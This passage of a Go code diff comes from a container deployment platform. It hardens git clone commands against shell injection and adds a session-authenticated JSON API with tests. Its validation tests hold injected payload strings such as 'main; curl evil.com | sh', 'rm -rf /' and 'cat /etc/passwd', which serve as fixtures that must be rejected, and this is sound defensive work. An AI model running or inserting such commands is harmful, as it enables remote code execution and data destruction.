 	return "", nil
@@ -566,57 +604,57 @@ func (c *Client) performClone(ctx context.Context, cfg *cloneConfig) (*CloneResu
 		}
 	}()
 
-	containerID, err := c.createGitContainer(ctx, cfg)
+	gitContainerID, err := c.createGitContainer(ctx, cfg)
 	if err != nil {
 		return nil, err
 	}
 
 	defer func() {
-		_ = c.docker.ContainerRemove(ctx, containerID, container.RemoveOptions{Force: true})
+		_ = c.docker.ContainerRemove(ctx, gitContainerID.String(), container.RemoveOptions{Force: true})
 	}()
 
-	return c.runGitClone(ctx, containerID)
+	return c.runGitClone(ctx, gitContainerID)
 }
 
 func (c *Client) createGitContainer(
 	ctx context.Context,
 	cfg *cloneConfig,
-) (string, error) {
+) (ContainerID, error) {
 	gitSSHCmd := "ssh -i /keys/deploy_key -o StrictHostKeyChecking=no"
 
-	// Build the git command based on whether we have a specific commit SHA
+	// Build the git command using environment variables to avoid shell injection.
-	var cmd []string
+	// Arguments are passed via env vars and quoted in the shell script.
-
+	var script string
-	var entrypoint []string
-
 	if cfg.commitSHA != "" {
 		// Clone without depth limit so we can checkout any commit, then checkout specific SHA
-		// Using sh -c to run multiple commands - need to clear entrypoint
+		script = `git clone --branch "$CLONE_BRANCH" "$CLONE_URL" /repo` +
-		// Output "COMMIT:<sha>" marker at end for parsing
+			` && cd /repo && git checkout "$CLONE_SHA"` +
-		script := fmt.Sprintf(
+			` && echo COMMIT:$(git rev-parse HEAD)`
-			"git clone --branch %s %s /repo && cd /repo && git checkout %s && echo COMMIT:$(git rev-parse HEAD)",
-			cfg.branch, cfg.repoURL, cfg.commitSHA,
-		)
-		entrypoint = []string{}
-		cmd = []string{"sh", "-c", script}
 	} else {
 		// Shallow clone of branch HEAD, then output commit SHA
-		// Using sh -c to run multiple commands
+		script = `git clone --depth 1 --branch "$CLONE_BRANCH" "$CLONE_URL" /repo` +
-		script := fmt.Sprintf(
+			` && cd /repo && echo COMMIT:$(git rev-parse HEAD)`
-			"git clone --depth 1 --branch %s %s /repo && cd /repo && echo COMMIT:$(git rev-parse HEAD)",
-			cfg.branch, cfg.repoURL,
-		)
-		entrypoint = []string{}
-		cmd = []string{"sh", "-c", script}
 	}
 
+	env := []string{
+		"GIT_SSH_COMMAND=" + gitSSHCmd,
+		"CLONE_URL=" + cfg.repoURL,
+		"CLONE_BRANCH=" + cfg.branch,
+	}
+	if cfg.commitSHA != "" {
+		env = append(env, "CLONE_SHA="+cfg.commitSHA)
+	}
+
+	entrypoint := []string{}
+	cmd := []string{"sh", "-c", script}
+
 	// Use host paths for Docker bind mounts (Docker runs on the host, not in our container)
 	resp, err := c.docker.ContainerCreate(ctx,
 		&container.Config{
 			Image:      gitImage,
 			Entrypoint: entrypoint,
 			Cmd:        cmd,
-			Env:        []string{"GIT_SSH_COMMAND=" + gitSSHCmd},
+			Env:        env,
 			WorkingDir: "/",
 		},
 		&container.HostConfig{
@@ -638,16 +676,16 @@ func (c *Client) createGitContainer(
 		return "", fmt.Errorf("failed to create git container: %w", err)
 	}
 
-	return resp.ID, nil
+	return ContainerID(resp.ID), nil
 }
 
-func (c *Client) runGitClone(ctx context.Context, containerID string) (*CloneResult, error) {
+func (c *Client) runGitClone(ctx context.Context, containerID ContainerID) (*CloneResult, error) {
-	err := c.docker.ContainerStart(ctx, containerID, container.StartOptions{})
+	err := c.docker.ContainerStart(ctx, containerID.String(), container.StartOptions{})
 	if err != nil {
 		return nil, fmt.Errorf("failed to start git container: %w", err)
 	}
 
-	statusCh, errCh := c.docker.ContainerWait(ctx, containerID, container.WaitConditionNotRunning)
+	statusCh, errCh := c.docker.ContainerWait(ctx, containerID.String(), container.WaitConditionNotRunning)
 
 	select {
 	case err := <-errCh:

internal/docker/types.go

@@ -0,0 +1,13 @@
+package docker
+
+// ImageID is a Docker image identifier (ID or tag).
+type ImageID string
+
+// String implements the fmt.Stringer interface.
+func (id ImageID) String() string { return string(id) }
+
+// ContainerID is a Docker container identifier.
+type ContainerID string
+
+// String implements the fmt.Stringer interface.
+func (id ContainerID) String() string { return string(id) }

internal/docker/validation_test.go

@@ -0,0 +1,148 @@
+package docker //nolint:testpackage // tests unexported regexps and Client struct
+
+import (
+	"errors"
+	"log/slog"
+	"testing"
+)
+
+func TestValidBranchRegex(t *testing.T) {
+	t.Parallel()
+
+	valid := []string{
+		"main",
+		"develop",
+		"feature/my-feature",
+		"release-1.0",
+		"v1.2.3",
+		"fix/issue_42",
+		"my.branch",
+	}
+	for _, b := range valid {
+		if !validBranchRe.MatchString(b) {
+			t.Errorf("expected branch %q to be valid", b)
+		}
+	}
+
+	invalid := []string{
+		"main; curl evil.com | sh",
+		"branch$(whoami)",
+		"branch`id`",
+		"branch && rm -rf /",
+		"branch | cat /etc/passwd",
+		"",
+		"branch name with spaces",
+		"branch\nnewline",
+	}
+	for _, b := range invalid {
+		if validBranchRe.MatchString(b) {
+			t.Errorf("expected branch %q to be invalid (potential injection)", b)
+		}
+	}
+}
+
+func TestValidCommitSHARegex(t *testing.T) {
+	t.Parallel()
+
+	valid := []string{
+		"abc123def456789012345678901234567890abcd",
+		"0000000000000000000000000000000000000000",
+		"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
+	}
+	for _, s := range valid {
+		if !validCommitSHARe.MatchString(s) {
+			t.Errorf("expected SHA %q to be valid", s)
+		}
+	}
+
+	invalid := []string{
+		"short",
+		"abc123",
+		"ABCDEF1234567890123456789012345678901234", // uppercase
+		"abc123def456789012345678901234567890abcd; rm -rf /",
+		"$(whoami)000000000000000000000000000000000",
+		"",
+	}
+	for _, s := range invalid {
+		if validCommitSHARe.MatchString(s) {
+			t.Errorf("expected SHA %q to be invalid (potential injection)", s)
+		}
+	}
+}
+
+func TestCloneRepoRejectsInjection(t *testing.T) { //nolint:funlen // table-driven test
+	t.Parallel()
+
+	c := &Client{
+		log: slog.Default(),
+	}
+
+	tests := []struct {
+		name      string
+		branch    string
+		commitSHA string
+		wantErr   error
+	}{
+		{
+			name:    "shell injection in branch",
+			branch:  "main; curl evil.com | sh #",
+			wantErr: ErrInvalidBranch,
+		},
+		{
+			name:    "command substitution in branch",
+			branch:  "$(whoami)",
+			wantErr: ErrInvalidBranch,
+		},
+		{
+			name:    "backtick injection in branch",
+			branch:  "`id`",
+			wantErr: ErrInvalidBranch,
+		},
+		{
+			name:      "injection in commitSHA",
+			branch:    "main",
+			commitSHA: "not-a-sha; rm -rf /",
+			wantErr:   ErrInvalidCommitSHA,
+		},
+		{
+			name:      "short SHA rejected",
+			branch:    "main",
+			commitSHA: "abc123",
+			wantErr:   ErrInvalidCommitSHA,
+		},
+		{
+			name:      "valid inputs pass validation (hit NotConnected)",
+			branch:    "main",
+			commitSHA: "abc123def456789012345678901234567890abcd",
+			wantErr:   ErrNotConnected,
+		},
+		{
+			name:    "valid branch no SHA passes validation (hit NotConnected)",
+			branch:  "main",
+			wantErr: ErrNotConnected,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			t.Parallel()
+
+			_, err := c.CloneRepo(
+				t.Context(),
+				"git@example.com:repo.git",
+				tt.branch,
+				tt.commitSHA,
+				"fake-key",
+				"/tmp/container",
+				"/tmp/host",
+			)
+			if err == nil {
+				t.Fatal("expected error, got nil")
+			}
+
+			if !errors.Is(err, tt.wantErr) {
+				t.Errorf("expected error %v, got %v", tt.wantErr, err)
+			}
+		})
+	}
+}

internal/handlers/api.go

@@ -0,0 +1,245 @@
+package handlers
+
+import (
+	"encoding/json"
+	"net/http"
+	"strconv"
+
+	"github.com/go-chi/chi/v5"
+
+	"git.eeqj.de/sneak/upaas/internal/models"
+)
+
+// apiAppResponse is the JSON representation of an app.
+type apiAppResponse struct {
+	ID             string `json:"id"`
+	Name           string `json:"name"`
+	RepoURL        string `json:"repoUrl"`
+	Branch         string `json:"branch"`
+	DockerfilePath string `json:"dockerfilePath"`
+	Status         string `json:"status"`
+	WebhookSecret  string `json:"webhookSecret"`
+	SSHPublicKey   string `json:"sshPublicKey"`
+	CreatedAt      string `json:"createdAt"`
+	UpdatedAt      string `json:"updatedAt"`
+}
+
+// apiDeploymentResponse is the JSON representation of a deployment.
+type apiDeploymentResponse struct {
+	ID         int64  `json:"id"`
+	AppID      string `json:"appId"`
+	CommitSHA  string `json:"commitSha,omitempty"`
+	Status     string `json:"status"`
+	Duration   string `json:"duration,omitempty"`
+	StartedAt  string `json:"startedAt"`
+	FinishedAt string `json:"finishedAt,omitempty"`
+}
+
+func appToAPI(a *models.App) apiAppResponse {
+	return apiAppResponse{
+		ID:             a.ID,
+		Name:           a.Name,
+		RepoURL:        a.RepoURL,
+		Branch:         a.Branch,
+		DockerfilePath: a.DockerfilePath,
+		Status:         string(a.Status),
+		WebhookSecret:  a.WebhookSecret,
+		SSHPublicKey:   a.SSHPublicKey,
+		CreatedAt:      a.CreatedAt.Format("2006-01-02T15:04:05Z"),
+		UpdatedAt:      a.UpdatedAt.Format("2006-01-02T15:04:05Z"),
+	}
+}
+
+func deploymentToAPI(d *models.Deployment) apiDeploymentResponse {
+	resp := apiDeploymentResponse{
+		ID:        d.ID,
+		AppID:     d.AppID,
+		Status:    string(d.Status),
+		Duration:  d.Duration(),
+		StartedAt: d.StartedAt.Format("2006-01-02T15:04:05Z"),
+	}
+
+	if d.CommitSHA.Valid {
+		resp.CommitSHA = d.CommitSHA.String
+	}
+
+	if d.FinishedAt.Valid {
+		resp.FinishedAt = d.FinishedAt.Time.Format("2006-01-02T15:04:05Z")
+	}
+
+	return resp
+}
+
+// HandleAPILoginPOST returns a handler that authenticates via JSON credentials
+// and sets a session cookie.
+func (h *Handlers) HandleAPILoginPOST() http.HandlerFunc {
+	type loginResponse struct {
+		UserID   int64  `json:"userId"`
+		Username string `json:"username"`
+	}
+
+	return func(writer http.ResponseWriter, request *http.Request) {
+		var req map[string]string
+
+		decodeErr := json.NewDecoder(request.Body).Decode(&req)
+		if decodeErr != nil {
+			h.respondJSON(writer, request,
+				map[string]string{"error": "invalid JSON body"},
+				http.StatusBadRequest)
+
+			return
+		}
+
+		username := req["username"]
+		credential := req["password"]
+
+		if username == "" || credential == "" {
+			h.respondJSON(writer, request,
+				map[string]string{"error": "username and password are required"},
+				http.StatusBadRequest)
+
+			return
+		}
+
+		user, authErr := h.auth.Authenticate(request.Context(), username, credential)
+		if authErr != nil {
+			h.respondJSON(writer, request,
+				map[string]string{"error": "invalid credentials"},
+				http.StatusUnauthorized)
+
+			return
+		}
+
+		sessionErr := h.auth.CreateSession(writer, request, user)
+		if sessionErr != nil {
+			h.log.Error("api: failed to create session", "error", sessionErr)
+			h.respondJSON(writer, request,
+				map[string]string{"error": "failed to create session"},
+				http.StatusInternalServerError)
+
+			return
+		}
+
+		h.respondJSON(writer, request, loginResponse{
+			UserID:   user.ID,
+			Username: user.Username,
+		}, http.StatusOK)
+	}
+}
+
+// HandleAPIListApps returns a handler that lists all apps as JSON.
+func (h *Handlers) HandleAPIListApps() http.HandlerFunc {
+	return func(writer http.ResponseWriter, request *http.Request) {
+		apps, err := h.appService.ListApps(request.Context())
+		if err != nil {
+			h.respondJSON(writer, request,
+				map[string]string{"error": "failed to list apps"},
+				http.StatusInternalServerError)
+
+			return
+		}
+
+		result := make([]apiAppResponse, 0, len(apps))
+		for _, a := range apps {
+			result = append(result, appToAPI(a))
+		}
+
+		h.respondJSON(writer, request, result, http.StatusOK)
+	}
+}
+
+// HandleAPIGetApp returns a handler that gets a single app by ID.
+func (h *Handlers) HandleAPIGetApp() http.HandlerFunc {
+	return func(writer http.ResponseWriter, request *http.Request) {
+		appID := chi.URLParam(request, "id")
+
+		application, err := h.appService.GetApp(request.Context(), appID)
+		if err != nil {
+			h.respondJSON(writer, request,
+				map[string]string{"error": "internal server error"},
+				http.StatusInternalServerError)
+
+			return
+		}
+
+		if application == nil {
+			h.respondJSON(writer, request,
+				map[string]string{"error": "app not found"},
+				http.StatusNotFound)
+
+			return
+		}
+
+		h.respondJSON(writer, request, appToAPI(application), http.StatusOK)
+	}
+}
+
+// deploymentsPageLimit is the default number of deployments per page.
+const deploymentsPageLimit = 20
+
+// HandleAPIListDeployments returns a handler that lists deployments for an app.
+func (h *Handlers) HandleAPIListDeployments() http.HandlerFunc {
+	return func(writer http.ResponseWriter, request *http.Request) {
+		appID := chi.URLParam(request, "id")
+
+		application, err := h.appService.GetApp(request.Context(), appID)
+		if err != nil || application == nil {
+			h.respondJSON(writer, request,
+				map[string]string{"error": "app not found"},
+				http.StatusNotFound)
+
+			return
+		}
+
+		limit := deploymentsPageLimit
+
+		if l := request.URL.Query().Get("limit"); l != "" {
+			parsed, parseErr := strconv.Atoi(l)
+			if parseErr == nil && parsed > 0 {
+				limit = parsed
+			}
+		}
+
+		deployments, deployErr := application.GetDeployments(
+			request.Context(), limit,
+		)
+		if deployErr != nil {
+			h.respondJSON(writer, request,
+				map[string]string{"error": "failed to list deployments"},
+				http.StatusInternalServerError)
+
+			return
+		}
+
+		result := make([]apiDeploymentResponse, 0, len(deployments))
+		for _, d := range deployments {
+			result = append(result, deploymentToAPI(d))
+		}
+
+		h.respondJSON(writer, request, result, http.StatusOK)
+	}
+}
+
+// HandleAPIWhoAmI returns a handler that shows the current authenticated user.
+func (h *Handlers) HandleAPIWhoAmI() http.HandlerFunc {
+	type whoAmIResponse struct {
+		UserID   int64  `json:"userId"`
+		Username string `json:"username"`
+	}
+
+	return func(writer http.ResponseWriter, request *http.Request) {
+		user, err := h.auth.GetCurrentUser(request.Context(), request)
+		if err != nil || user == nil {
+			h.respondJSON(writer, request,
+				map[string]string{"error": "unauthorized"},
+				http.StatusUnauthorized)
+
+			return
+		}
+
+		h.respondJSON(writer, request, whoAmIResponse{
+			UserID:   user.ID,
+			Username: user.Username,
+		}, http.StatusOK)
+	}
+}

internal/handlers/api_test.go

@@ -0,0 +1,236 @@
+package handlers_test
+
+import (
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+
+	"github.com/go-chi/chi/v5"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+
+	"git.eeqj.de/sneak/upaas/internal/service/app"
+)
+
+// apiRouter builds a chi router with the API routes using session auth middleware.
+func apiRouter(tc *testContext) http.Handler {
+	r := chi.NewRouter()
+
+	r.Route("/api/v1", func(apiR chi.Router) {
+		apiR.Post("/login", tc.handlers.HandleAPILoginPOST())
+
+		apiR.Group(func(apiR chi.Router) {
+			apiR.Use(tc.middleware.APISessionAuth())
+			apiR.Get("/whoami", tc.handlers.HandleAPIWhoAmI())
+			apiR.Get("/apps", tc.handlers.HandleAPIListApps())
+			apiR.Get("/apps/{id}", tc.handlers.HandleAPIGetApp())
+			apiR.Get("/apps/{id}/deployments", tc.handlers.HandleAPIListDeployments())
+		})
+	})
+
+	return r
+}
+
+// setupAPITest creates a test context with a user and returns session cookies.
+func setupAPITest(t *testing.T) (*testContext, []*http.Cookie) {
+	t.Helper()
+
+	tc := setupTestHandlers(t)
+
+	// Create a user.
+	_, err := tc.authSvc.CreateUser(t.Context(), "admin", "password123")
+	require.NoError(t, err)
+
+	// Login via the API to get session cookies.
+	r := apiRouter(tc)
+
+	loginBody := `{"username":"admin","password":"password123"}`
+	req := httptest.NewRequest(http.MethodPost, "/api/v1/login", strings.NewReader(loginBody))
+	req.Header.Set("Content-Type", "application/json")
+
+	rr := httptest.NewRecorder()
+	r.ServeHTTP(rr, req)
+
+	require.Equal(t, http.StatusOK, rr.Code)
+
+	cookies := rr.Result().Cookies()
+	require.NotEmpty(t, cookies, "login should return session cookies")
+
+	return tc, cookies
+}
+
+// apiGet makes an authenticated GET request using session cookies.
+func apiGet(
+	t *testing.T,
+	tc *testContext,
+	cookies []*http.Cookie,
+	path string,
+) *httptest.ResponseRecorder {
+	t.Helper()
+
+	req := httptest.NewRequest(http.MethodGet, path, nil)
+
+	for _, c := range cookies {
+		req.AddCookie(c)
+	}
+
+	rr := httptest.NewRecorder()
+
+	r := apiRouter(tc)
+	r.ServeHTTP(rr, req)
+
+	return rr
+}
+
+func TestAPILoginSuccess(t *testing.T) {
+	t.Parallel()
+
+	tc := setupTestHandlers(t)
+
+	_, err := tc.authSvc.CreateUser(t.Context(), "admin", "password123")
+	require.NoError(t, err)
+
+	r := apiRouter(tc)
+
+	body := `{"username":"admin","password":"password123"}`
+	req := httptest.NewRequest(http.MethodPost, "/api/v1/login", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+
+	rr := httptest.NewRecorder()
+	r.ServeHTTP(rr, req)
+
+	assert.Equal(t, http.StatusOK, rr.Code)
+
+	var resp map[string]any
+	require.NoError(t, json.Unmarshal(rr.Body.Bytes(), &resp))
+	assert.Equal(t, "admin", resp["username"])
+
+	// Should have a Set-Cookie header.
+	assert.NotEmpty(t, rr.Result().Cookies())
+}
+
+func TestAPILoginInvalidCredentials(t *testing.T) {
+	t.Parallel()
+
+	tc := setupTestHandlers(t)
+
+	_, err := tc.authSvc.CreateUser(t.Context(), "admin", "password123")
+	require.NoError(t, err)
+
+	r := apiRouter(tc)
+
+	body := `{"username":"admin","password":"wrong"}`
+	req := httptest.NewRequest(http.MethodPost, "/api/v1/login", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+
+	rr := httptest.NewRecorder()
+	r.ServeHTTP(rr, req)
+
+	assert.Equal(t, http.StatusUnauthorized, rr.Code)
+}
+
+func TestAPILoginMissingFields(t *testing.T) {
+	t.Parallel()
+
+	tc := setupTestHandlers(t)
+
+	r := apiRouter(tc)
+
+	body := `{"username":"","password":""}`
+	req := httptest.NewRequest(http.MethodPost, "/api/v1/login", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+
+	rr := httptest.NewRecorder()
+	r.ServeHTTP(rr, req)
+
+	assert.Equal(t, http.StatusBadRequest, rr.Code)
+}
+
+func TestAPIRejectsUnauthenticated(t *testing.T) {
+	t.Parallel()
+
+	tc := setupTestHandlers(t)
+
+	r := apiRouter(tc)
+
+	req := httptest.NewRequest(http.MethodGet, "/api/v1/apps", nil)
+	rr := httptest.NewRecorder()
+	r.ServeHTTP(rr, req)
+
+	assert.Equal(t, http.StatusUnauthorized, rr.Code)
+}
+
+func TestAPIWhoAmI(t *testing.T) {
+	t.Parallel()
+
+	tc, cookies := setupAPITest(t)
+
+	rr := apiGet(t, tc, cookies, "/api/v1/whoami")
+	assert.Equal(t, http.StatusOK, rr.Code)
+
+	var resp map[string]any
+	require.NoError(t, json.Unmarshal(rr.Body.Bytes(), &resp))
+	assert.Equal(t, "admin", resp["username"])
+}
+
+func TestAPIListAppsEmpty(t *testing.T) {
+	t.Parallel()
+
+	tc, cookies := setupAPITest(t)
+
+	rr := apiGet(t, tc, cookies, "/api/v1/apps")
+	assert.Equal(t, http.StatusOK, rr.Code)
+
+	var apps []any
+	require.NoError(t, json.Unmarshal(rr.Body.Bytes(), &apps))
+	assert.Empty(t, apps)
+}
+
+func TestAPIGetApp(t *testing.T) {
+	t.Parallel()
+
+	tc, cookies := setupAPITest(t)
+
+	created, err := tc.appSvc.CreateApp(t.Context(), app.CreateAppInput{
+		Name:    "my-app",
+		RepoURL: "https://github.com/example/repo",
+	})
+	require.NoError(t, err)
+
+	rr := apiGet(t, tc, cookies, "/api/v1/apps/"+created.ID)
+	assert.Equal(t, http.StatusOK, rr.Code)
+
+	var resp map[string]any
+	require.NoError(t, json.Unmarshal(rr.Body.Bytes(), &resp))
+	assert.Equal(t, "my-app", resp["name"])
+}
+
+func TestAPIGetAppNotFound(t *testing.T) {
+	t.Parallel()
+
+	tc, cookies := setupAPITest(t)
+
+	rr := apiGet(t, tc, cookies, "/api/v1/apps/nonexistent")
+	assert.Equal(t, http.StatusNotFound, rr.Code)
+}
+
+func TestAPIListDeployments(t *testing.T) {
+	t.Parallel()
+
+	tc, cookies := setupAPITest(t)
+
+	created, err := tc.appSvc.CreateApp(t.Context(), app.CreateAppInput{
+		Name:    "deploy-app",
+		RepoURL: "https://github.com/example/repo",
+	})
+	require.NoError(t, err)
+
+	rr := apiGet(t, tc, cookies, "/api/v1/apps/"+created.ID+"/deployments")
+	assert.Equal(t, http.StatusOK, rr.Code)
+
+	var deployments []any
+	require.NoError(t, json.Unmarshal(rr.Body.Bytes(), &deployments))
+	assert.Empty(t, deployments)
+}

internal/handlers/app.go

@@ -4,6 +4,8 @@ import (
 	"context"
 	"database/sql"
 	"encoding/json"
+	"errors"
+	"fmt"
 	"net/http"
 	"os"
 	"path/filepath"
@@ -29,19 +31,15 @@ const (
 func (h *Handlers) HandleAppNew() http.HandlerFunc {
 	tmpl := templates.GetParsed()
 
-	return func(writer http.ResponseWriter, _ *http.Request) {
+	return func(writer http.ResponseWriter, request *http.Request) {
-		data := h.addGlobals(map[string]any{})
+		data := h.addGlobals(map[string]any{}, request)
 
-		err := tmpl.ExecuteTemplate(writer, "app_new.html", data)
+		h.renderTemplate(writer, tmpl, "app_new.html", data)
-		if err != nil {
-			h.log.Error("template execution failed", "error", err)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
 	}
 }
 
 // HandleAppCreate handles app creation.
-func (h *Handlers) HandleAppCreate() http.HandlerFunc {
+func (h *Handlers) HandleAppCreate() http.HandlerFunc { //nolint:funlen // validation adds necessary length
 	tmpl := templates.GetParsed()
 
 	return func(writer http.ResponseWriter, request *http.Request) {
@@ -57,16 +55,32 @@ func (h *Handlers) HandleAppCreate() http.HandlerFunc {
 		branch := request.FormValue("branch")
 		dockerfilePath := request.FormValue("dockerfile_path")
 
-		data := map[string]any{
+		data := h.addGlobals(map[string]any{
 			"Name":           name,
 			"RepoURL":        repoURL,
 			"Branch":         branch,
 			"DockerfilePath": dockerfilePath,
-		}
+		}, request)
 
 		if name == "" || repoURL == "" {
 			data["Error"] = "Name and repository URL are required"
-			_ = tmpl.ExecuteTemplate(writer, "app_new.html", data)
+			h.renderTemplate(writer, tmpl, "app_new.html", data)
+
+			return
+		}
+
+		nameErr := validateAppName(name)
+		if nameErr != nil {
+			data["Error"] = "Invalid app name: " + nameErr.Error()
+			h.renderTemplate(writer, tmpl, "app_new.html", data)
+
+			return
+		}
+
+		repoURLErr := validateRepoURL(repoURL)
+		if repoURLErr != nil {
+			data["Error"] = "Invalid repository URL: " + repoURLErr.Error()
+			h.renderTemplate(writer, tmpl, "app_new.html", data)
 
 			return
 		}
@@ -91,7 +105,7 @@ func (h *Handlers) HandleAppCreate() http.HandlerFunc {
 		if createErr != nil {
 			h.log.Error("failed to create app", "error", createErr)
 			data["Error"] = "Failed to create app: " + createErr.Error()
-			_ = tmpl.ExecuteTemplate(writer, "app_new.html", data)
+			h.renderTemplate(writer, tmpl, "app_new.html", data)
 
 			return
 		}
@@ -150,13 +164,9 @@ func (h *Handlers) HandleAppDetail() http.HandlerFunc {
 			"WebhookURL":       webhookURL,
 			"DeployKey":        deployKey,
 			"Success":          request.URL.Query().Get("success"),
-		})
+		}, request)
 
-		err := tmpl.ExecuteTemplate(writer, "app_detail.html", data)
+		h.renderTemplate(writer, tmpl, "app_detail.html", data)
-		if err != nil {
-			h.log.Error("template execution failed", "error", err)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
 	}
 }
 
@@ -183,18 +193,14 @@ func (h *Handlers) HandleAppEdit() http.HandlerFunc {
 
 		data := h.addGlobals(map[string]any{
 			"App": application,
-		})
+		}, request)
 
-		err := tmpl.ExecuteTemplate(writer, "app_edit.html", data)
+		h.renderTemplate(writer, tmpl, "app_edit.html", data)
-		if err != nil {
-			h.log.Error("template execution failed", "error", err)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
 	}
 }
 
 // HandleAppUpdate handles app updates.
-func (h *Handlers) HandleAppUpdate() http.HandlerFunc {
+func (h *Handlers) HandleAppUpdate() http.HandlerFunc { //nolint:funlen // validation adds necessary length
 	tmpl := templates.GetParsed()
 
 	return func(writer http.ResponseWriter, request *http.Request) {
@@ -214,7 +220,31 @@ func (h *Handlers) HandleAppUpdate() http.HandlerFunc {
 			return
 		}
 
-		application.Name = request.FormValue("name")
+		newName := request.FormValue("name")
+
+		nameErr := validateAppName(newName)
+		if nameErr != nil {
+			data := h.addGlobals(map[string]any{
+				"App":   application,
+				"Error": "Invalid app name: " + nameErr.Error(),
+			}, request)
+			h.renderTemplate(writer, tmpl, "app_edit.html", data)
+
+			return
+		}
+
+		repoURLErr := validateRepoURL(request.FormValue("repo_url"))
+		if repoURLErr != nil {
+			data := h.addGlobals(map[string]any{
+				"App":   application,
+				"Error": "Invalid repository URL: " + repoURLErr.Error(),
+			}, request)
+			h.renderTemplate(writer, tmpl, "app_edit.html", data)
+
+			return
+		}
+
+		application.Name = newName
 		application.RepoURL = request.FormValue("repo_url")
 		application.Branch = request.FormValue("branch")
 		application.DockerfilePath = request.FormValue("dockerfile_path")
@@ -241,11 +271,11 @@ func (h *Handlers) HandleAppUpdate() http.HandlerFunc {
 		if saveErr != nil {
 			h.log.Error("failed to update app", "error", saveErr)
 
-			data := map[string]any{
+			data := h.addGlobals(map[string]any{
 				"App":   application,
 				"Error": "Failed to update app",
-			}
+			}, request)
-			_ = tmpl.ExecuteTemplate(writer, "app_edit.html", data)
+			h.renderTemplate(writer, tmpl, "app_edit.html", data)
 
 			return
 		}
@@ -255,6 +285,33 @@ func (h *Handlers) HandleAppUpdate() http.HandlerFunc {
 	}
 }
 
+// cleanupContainer stops and removes the Docker container for the given app.
+func (h *Handlers) cleanupContainer(ctx context.Context, appID, appName string) {
+	containerInfo, containerErr := h.docker.FindContainerByAppID(ctx, appID)
+	if containerErr != nil || containerInfo == nil {
+		return
+	}
+
+	if containerInfo.Running {
+		stopErr := h.docker.StopContainer(ctx, containerInfo.ID)
+		if stopErr != nil {
+			h.log.Error("failed to stop container during app deletion",
+				"error", stopErr, "app", appName,
+				"container", containerInfo.ID)
+		}
+	}
+
+	removeErr := h.docker.RemoveContainer(ctx, containerInfo.ID, true)
+	if removeErr != nil {
+		h.log.Error("failed to remove container during app deletion",
+			"error", removeErr, "app", appName,
+			"container", containerInfo.ID)
+	} else {
+		h.log.Info("removed container during app deletion",
+			"app", appName, "container", containerInfo.ID)
+	}
+}
+
 // HandleAppDelete handles app deletion.
 func (h *Handlers) HandleAppDelete() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
@@ -267,6 +324,9 @@ func (h *Handlers) HandleAppDelete() http.HandlerFunc {
 			return
 		}
 
+		// Stop and remove the Docker container before deleting the DB record
+		h.cleanupContainer(request.Context(), appID, application.Name)
+
 		deleteErr := application.Delete(request.Context())
 		if deleteErr != nil {
 			h.log.Error("failed to delete app", "error", deleteErr)
@@ -296,7 +356,7 @@ func (h *Handlers) HandleAppDeploy() http.HandlerFunc {
 		deployCtx := context.WithoutCancel(request.Context())
 
 		go func(ctx context.Context, appToDeploy *models.App) {
-			deployErr := h.deploy.Deploy(ctx, appToDeploy, nil)
+			deployErr := h.deploy.Deploy(ctx, appToDeploy, nil, false)
 			if deployErr != nil {
 				h.log.Error(
 					"deployment failed",
@@ -315,6 +375,56 @@ func (h *Handlers) HandleAppDeploy() http.HandlerFunc {
 	}
 }
 
+// HandleCancelDeploy cancels an in-progress deployment for an app.
+func (h *Handlers) HandleCancelDeploy() http.HandlerFunc {
+	return func(writer http.ResponseWriter, request *http.Request) {
+		appID := chi.URLParam(request, "id")
+
+		application, findErr := models.FindApp(request.Context(), h.db, appID)
+		if findErr != nil || application == nil {
+			http.NotFound(writer, request)
+
+			return
+		}
+
+		cancelled := h.deploy.CancelDeploy(application.ID)
+		if cancelled {
+			h.log.Info("deployment cancelled by user", "app", application.Name)
+		}
+
+		http.Redirect(
+			writer,
+			request,
+			"/apps/"+application.ID,
+			http.StatusSeeOther,
+		)
+	}
+}
+
+// HandleAppRollback handles rolling back to the previous deployment image.
+func (h *Handlers) HandleAppRollback() http.HandlerFunc {
+	return func(writer http.ResponseWriter, request *http.Request) {
+		appID := chi.URLParam(request, "id")
+
+		application, findErr := models.FindApp(request.Context(), h.db, appID)
+		if findErr != nil || application == nil {
+			http.NotFound(writer, request)
+
+			return
+		}
+
+		rollbackErr := h.deploy.Rollback(request.Context(), application)
+		if rollbackErr != nil {
+			h.log.Error("rollback failed", "error", rollbackErr, "app", application.Name)
+			http.Redirect(writer, request, "/apps/"+application.ID, http.StatusSeeOther)
+
+			return
+		}
+
+		http.Redirect(writer, request, "/apps/"+application.ID+"?success=rolledback", http.StatusSeeOther)
+	}
+}
+
 // HandleAppDeployments returns the deployments history handler.
 func (h *Handlers) HandleAppDeployments() http.HandlerFunc {
 	tmpl := templates.GetParsed()
@@ -337,18 +447,36 @@ func (h *Handlers) HandleAppDeployments() http.HandlerFunc {
 		data := h.addGlobals(map[string]any{
 			"App":         application,
 			"Deployments": deployments,
-		})
+		}, request)
 
-		err := tmpl.ExecuteTemplate(writer, "deployments.html", data)
+		h.renderTemplate(writer, tmpl, "deployments.html", data)
-		if err != nil {
-			h.log.Error("template execution failed", "error", err)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
 	}
 }
 
-// defaultLogTail is the default number of log lines to fetch.
+// DefaultLogTail is the default number of log lines to fetch.
-const defaultLogTail = "500"
+const DefaultLogTail = "500"
+
+// maxLogTail is the maximum allowed value for the tail parameter.
+const maxLogTail = 500
+
+// SanitizeTail validates and clamps the tail query parameter.
+// It returns a numeric string clamped to maxLogTail, or the default if invalid.
+func SanitizeTail(raw string) string {
+	if raw == "" {
+		return DefaultLogTail
+	}
+
+	n, err := strconv.Atoi(raw)
+	if err != nil || n < 1 {
+		return DefaultLogTail
+	}
+
+	if n > maxLogTail {
+		n = maxLogTail
+	}
+
